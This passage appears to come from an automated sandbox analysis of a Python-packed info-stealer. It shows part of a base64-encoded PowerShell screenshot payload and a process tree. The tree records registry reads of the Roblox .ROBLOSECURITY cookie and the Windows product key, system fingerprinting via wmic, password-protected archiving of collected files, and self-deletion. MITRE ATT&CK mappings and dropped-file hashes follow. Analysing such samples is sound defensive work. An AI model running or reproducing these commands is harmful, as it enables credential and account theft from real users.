BsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4828
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ujqynaz5\ujqynaz5.cmdline"
        5⤵
        
        PID:812
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5AA3.tmp" "c:\Users\Admin\AppData\Local\Temp\ujqynaz5\CSC179FE232A6064475B0FA57FAF04176D2.TMP"
        6⤵
        
        PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4264
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:4688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2580
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4012
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3020
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3576
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3196
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4002\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\fpCB0.zip" *"
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\_MEI4002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI4002\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\fpCB0.zip" *
      4⤵
      Executes dropped EXE
      PID:368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:692
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3680
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3356
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2132
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2988
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3192
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\loader.exe""
    3⤵
    PID:1948
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:5000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
eedc851ccfb2e8281babb78c2f244c68

SHA1
4df05baf7c1b4f14aad3244aa30e95f234504eaf

SHA256
f8bb083f4072511a1b6c0c2e571a376fb678719fc20890ec96be851d25eaa790

SHA512
643d95f22f271d585f33609fefe30fd17b5b0380613553a86d1e94d5fb602660f2d4b7196915ac5e00f1d17702bbbecf9f4274f5dbb18820745a215b91cbc7ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
2274ad785cd8dcfbe750c3eef680c217

SHA1
2fa8d5c532720aaeed82de2d155ee1058d03b51c

SHA256
2be7de16495ed14674de42a82123f7f7168c2a6e4ddfda67b378a1f332365ded

SHA512
f472b00ee526783d5bdc48f465228a4d942d3c1aa46bdc96cb51bf11e82d33ff7c0d628f4fa6ddbd57fe7633dcedd4603c0ad763379595520f0cac80fb451f00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4ce34c2edc91c0f5050a5a8c72a0d2a9

SHA1
e2ab1f781634e360f1002a81f6e1119c13abfbd0

SHA256
ee4c196d3213a1c9c5c77a23d0d340025bfa244fb60394378b66639c7218d0d0

SHA512
a8679cdfed98261770d6f20fda11ace77a90a6d66047c5b6038cb5b298f3f3256f2f8f803b18744f92aaa16a7d203caafab00b7a2d3ef038a33abe992e7fff6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c20c216f1baf60def49eb724cd512544

SHA1
ed5220493d8f393f43cb34f20360f56a7c4d1094

SHA256
1573e5a95d2f19e8419f17b30559f0a478caa953a0916353f4eb72bfb25cd99b

SHA512
1ce8c8095e2c3307b63650c85500d1e1ff89d8655e4d2ae0adc02a50b584fef2d7c4da09018716c94dcecba4bf12130810591b947f4c638fa9192a0db6b191de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
af2559d9d9abda9282b028691628414c

SHA1
d9dbd7bbc4a92f511ab1c123d23b7f9c7e780e4f

SHA256
76b9d37b925bac38d050b90e10d4656abd0cb4401c9f1dd16ce2e0bc95e1befb

SHA512
4d6488dd468396974f2500c0e38a818c915f1d45205d9362515966e6fc1b4ec243665f7346e7a66a1f69dd7403d44f65b1155753d9e62bbf5311b14dd5449fca

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5AA3.tmp

Filesize
1KB

MD5
4f678b8e0e6703afa19054c51dfa2169

SHA1
907d7efc0dfe02b27dc98dd06ff87a6274f6896f

SHA256
ac7b47a48e50b872de20d7d57b31684a18c2f20a8adf673a317a0c2f496e549c

SHA512
1d1233666dd66f873dab1fd26894e94abe07edec034abb4ff4ac51f0f1d8277f8ed3211cc333244b393361c7c49008c25eb66bea907d2b6e6510266f91ccda0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\VCRUNTIME140.dll

Filesize
88KB

MD5
1d4ff3cf64ab08c66ae9a4013c89a3ac

SHA1
f9ee15d0e9b0b7e04ff4c8a5de5afcffe8b2527b

SHA256
65f620bc588d95fe2ed236d1602e49f89077b434c83102549eed137c7fdc7220

SHA512
65fbd68843280e933620c470e524fba993ab4c48ede4bc0917b4ebe25da0408d02daec3f5afcd44a3ff8aba676d2eff2dda3f354029d27932ef39c9fdea51c26

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_bz2.pyd

Filesize
44KB

MD5
524989939f0351e080644e8c34ccfae5

SHA1
5d8974926381f844118c8b5455d0e7e133f7566c

SHA256
2fd24d9893d41508d1736972f1a4fb241c93beaa49895977e563faf8214410de

SHA512
f6800a7eb6f655e8ebd2c2c33da02252a019ab3085d1947dd50a69206fc2be912c8e11ff10119c4374996248c0ef4d92462043dce4bc08065ebbd12ba82cbaf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_ctypes.pyd

Filesize
52KB

MD5
c917494b6c8c29361e42072dd17ade16

SHA1
f06b04f2c2cf9d84b7d25bb9aeebc6436d2b2bdf

SHA256
bf1454154ea8b62616461660e084c13d199f0570dc14f0e02d25b053f63ce300

SHA512
b064494c6c292969a8694f006f691b9ba00181a1d11c310ddfaa94f3b908248e5098a9e322008ee081e215c1aeed5b6c4bfeab7ac84e0dd88999fc094b4f672f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_decimal.pyd

Filesize
79KB

MD5
35642e5645ccfa5fa3616a4f171c6ab0

SHA1
b555808ca4ba195941ad9b50fe95f9d6ce0a8d50

SHA256
f57bd98ca4c2a7a67e6104e6eab7acf7f6a0c0f09d88efcb1688d67e298b6d7c

SHA512
4eb499dd35002982b4b37fe27a870b8a53248657e01b9aeaf25d2485c9fbef474d2f2cbe1e945b1301c87db840913d9cb802ba861e10f59010ae2e5a50f044ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_hashlib.pyd

Filesize
30KB

MD5
fc7927b65769cf47c6299402acdff309

SHA1
ab31ac116af567e551e5de9c6a5d69e98726b561

SHA256
f99a9e0c3df7de17123588c9f8db37c7ac79b7868084efcc706bd73644d06c75

SHA512
80a6ed86dba65df5619d402a0465dc9e696508623dfcaf6e0ebc5a5fc2da891f9e9694abad00e281cbead015e42e7aec674fb233c9a6140c4fd1d2f3111252f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_lzma.pyd

Filesize
79KB

MD5
6ff7a730ddd5f767aa1975d3784c35a9

SHA1
64b89b1d29d66cf794f6fc3b30ea0f467d2e05c8

SHA256
f17f1359bfa5e65b504c0d1b9e949e755b4d36bc3d9d34dfe24207371e3be92a

SHA512
335d7ec2d76967bf04b53fa17ce5d0205f6cd4f22521fab21384cabc43c968a7b26efe77f779d60380a7262f4ccc2e7877ad26ef4784061390eee517f3b83115

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_queue.pyd

Filesize
24KB

MD5
f002633067073ce11b6b7397c2a48624

SHA1
7c9242a89f75b20ef19817425b3c88c17a23ddda

SHA256
90a5855f580838f5810f1d866380fc4a6cf7b16afb57e214b3fc49b27dcb0676

SHA512
1b6301cb2df1276806dd5f8671d11f3ce91841ad3cee92633cb86d648d8285ced5a77aac064a1108451745c466c494eb16cf74d4a56dc6d6204f681238da8d16

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_socket.pyd

Filesize
38KB

MD5
722d7afdd01ec565a432cce7d8bfd8ed

SHA1
e7c6bab41e0fc79a247eeb014d584b507fd37a96

SHA256
6eeeac340cabb9e8ac3aef6d63e3891ef830817894de18f42f78459b3ff9d4a6

SHA512
6480d57eec5c59510e9401edf55aa1e8b1ea816a8e4263fcaf98a4fc4f91e4126b1cafad822ca2163329c339bfa7c24ecd51302ff543fcdb7e68b9917b7e6526

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_sqlite3.pyd

Filesize
44KB

MD5
648d185e67616e97457ab675d4c230b5

SHA1
5db9230c200c6a6ee29aec12f68aaed9aab0c3c8

SHA256
0e9442dda8326e3006d1e367fcf8eb8eb3fb328341aaa0ab0f3c5a4345770cce

SHA512
02726e221f9e0faa68ea36dc601da57de1ebd77905055e7d8b66c6ab643e50f58b422f490c6048a373ddbb5208e94e98875b3a043e598f487ac330b962237c6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\_ssl.pyd

Filesize
61KB

MD5
b0b8317d4311645ef24652afc8253cbf

SHA1
c3e54221e31432cc4cf2a18e79617391be445ffb

SHA256
d1da4f2983a8621b5b9a17fa6f603a9e7c3342f130eaacb36003ca7868935719

SHA512
8812394a68bcc1aa50776e0b3cb5c4acd979621b84a29db9930f137f510e4db1106ff07083d23c37ff338f55474a65349162e2ff51b5c49ad375a94efeab057e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\base_library.zip

Filesize
1.4MB

MD5
32ede00817b1d74ce945dcd1e8505ad0

SHA1
51b5390db339feeed89bffca925896aff49c63fb

SHA256
4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

SHA512
a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\blank.aes

Filesize
120KB

MD5
6554a933c75d4574537c3e78be9925bf

SHA1
ab7d62e8bb381dc63682549217ef4605b8da178c

SHA256
c4609589c8524c9000b85c4db66732fdb4b95593f4650541617426f2ce07fe26

SHA512
b297aabedd88e5475c71f9419831d18265280be3f5bd81673254536e53209f9d6714f5f1cefa60913b2455cbf053d0275071f80a39bc5c6dd5503f0406dd53d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\libcrypto-3.dll

Filesize
1022KB

MD5
113de1bf32512cb3c521bb6f7b5b11c0

SHA1
9387afface76e420735d2f32646b12698ccb4f18

SHA256
d7e56c6b5c73d67a7e7c5e73700f1696e944eb013f3d14ff9f983c4f93594d01

SHA512
f97f9c8952b40f686a119111585c3231d23dc33edab7f557ac6f69f82e83d0ea375b67aa036e9b339853ee388cc62cac55e23b5a9323d8492b35ca9ba3e9f8e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\libffi-8.dll

Filesize
28KB

MD5
50d1bacecfb4df4b7f4080803cb07e4a

SHA1
e4fd81cc1de13291f5a113f386e831396d6db41d

SHA256
d555fc44125cfa750721ecd47ef64b5e1ecebbe5e94e25ea47c78dd797a94c6f

SHA512
12f9a4989ce535f3907b894589c9df18832c057d58d0674340c80d28171fdd6b2c4a1f0f581083ce4167e51013b913f05b694b370dbc3bfc43a3528814168156

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\libssl-3.dll

Filesize
190KB

MD5
600f861907d668d914d16a277b845d04

SHA1
f37452a1bf601a156f12f927e97a005d0763fcac

SHA256
677b0d256dc23818ee27799f92fe3795f0e75b57e707fcc3897062db673c0926

SHA512
0ffc4f578de4af6b397e76e696b58973e2928f9f4dacd02a73993945497310d6acdbefaaa0a5c75eb1f8052c1ef18189b57989db0183fe50a66b0c3d7264e17c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\python311.dll

Filesize
1.4MB

MD5
711da56eb35a88095f2baad0e821aa24

SHA1
2755f0d62c54642e936b63974fecc48a971e02e8

SHA256
d8c4c37f8826d9f906686a6b89ba3e37ee766be2893b0a7a9f49fd74f3e6f7a6

SHA512
556151238325dcd7b6d24864b39414cb0d4c2b18e98ac2446a2939bf0312d5b58128f6601e739c300bf3a38c4ddb84078a7b2e800d4e59875c21e23468e38a01

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\select.pyd

Filesize
24KB

MD5
cb4299085672ed660952b896cd01ee28

SHA1
40b352d2afd264ed7bf3606dd867a83d5cffa30c

SHA256
0ad2612b3507ddbae829fb57b6ac7502edc21dcce331cbd415f229ff0d558250

SHA512
47c0ba29aeca732c9e2276e13f87c11a14764dfd47d6f0499034cdddcbb6d1ddd29cd0d8ee87bf7429bdcac5fff187ea4306ffd1e8bc026847e7e24556489f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\sqlite3.dll

Filesize
505KB

MD5
b2a51ffbb7178ad2ccb0fab921632b6d

SHA1
3d20de641c4f07d4f5cdb55a73e9f6db3d2df4b0

SHA256
8fd5e24c37b48442f0627fbdda965fc0daab1c943b54afdb86170af9bc743054

SHA512
c5988f6db64f0a1eac7cf377f46f6311e09c334e5f765d995e1611ec224944d6db151edeb27530c1c8b6e4d917ba8d5dfd69537728f729124357979aca136f5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4002\unicodedata.pyd

Filesize
291KB

MD5
6a414e240bd7075c730f0873c3d66cbe

SHA1
22e5f2aee0f0342114aff9d959dfc826c63a86c4

SHA256
e249ff5b219e838f6198a256b64a70025877c797e65cbffc2eda594a76e1c1ac

SHA512
e5c626388bf7f0d93bd6bf89e8f723a413311e98807e32458cff8ab0d95519402e708d73446486db60b9faa010aebfdec0ac78a9bf9551fbaa33a396510682dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arvbttjx.0cg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ujqynaz5\ujqynaz5.dll

Filesize
4KB

MD5
6f517d1b6be28e711139d9941eae5691

SHA1
732be55cb0b115ff1e4dd4036cff856daff8609a

SHA256
53693eb5ec4c4efac14c4ac560061eb4445f0a0128d6dec81d59d41403bb8f75

SHA512
ec22e9ce45d934bdb37e2eecfdf6ddafba44d82a5835496bf66214f0dc420558c851cecad75e9f7db601dc9ff91fcae05ef79c340a361d522649da5df4ff9e70

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\RegisterSync.doc

Filesize
651KB

MD5
d1ce06c5c6064a28b87d648ced11902b

SHA1
12c8152ca38794745cdfec00cae6a8c72cc1dfec

SHA256
27fcc2653b78a03ebc3909211651c7b310f576f5fae79eda29f0bfb87baf842e

SHA512
a279bffcfc28105296052297c8ff20bbcda0cbaf20435379566b062c281f24b27070e6e59ddc1d8aa914dd79e6a401319c1039585e39048de3733efb457cdc68

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\Files.docx

Filesize
11KB

MD5
4a8fbd593a733fc669169d614021185b

SHA1
166e66575715d4c52bcb471c09bdbc5a9bb2f615

SHA256
714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42

SHA512
6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\Opened.docx

Filesize
11KB

MD5
bfbc1a403197ac8cfc95638c2da2cf0e

SHA1
634658f4dd9747e87fa540f5ba47e218acfc8af2

SHA256
272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6

SHA512
b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\Recently.docx

Filesize
11KB

MD5
3b068f508d40eb8258ff0b0592ca1f9c

SHA1
59ac025c3256e9c6c86165082974fe791ff9833a

SHA256
07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7

SHA512
e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\RedoConvert.txt

Filesize
765KB

MD5
91682fa7a4164380e1e2222247afca90

SHA1
75d40d5e479f24ad0ae4e40e7f90bc9388b4d8b0

SHA256
84558dc3ca8beac3291823417d758e91fe1f57afefb6145d48e5d6c7484ba4c4

SHA512
f758d26d0ed715bf52c59c8a07c031e6903d377261fef1c1fd48ef680f037a34bf9c85d0bad239f777ebb955af802e88b381d9a56dd9b10453c28db8762b2818

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\RemoveComplete.docx

Filesize
399KB

MD5
30c170505733f41258fe339a1f345edb

SHA1
5d6476277b8ce424728eccab7df48eca773dfba1

SHA256
83f587bc960176b188a629663f60416eff378b84ea2df328e0b9517e1ae78ef8

SHA512
f47aa00b7a3b1b6c2b655a8d901223473555c6206088514d5ee32dd6142d01f7b49b7c1caf1392767fbcb0f43c040a94b27f9764b156ea5ddf2cb389ef13cad5

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\These.docx

Filesize
11KB

MD5
87cbab2a743fb7e0625cc332c9aac537

SHA1
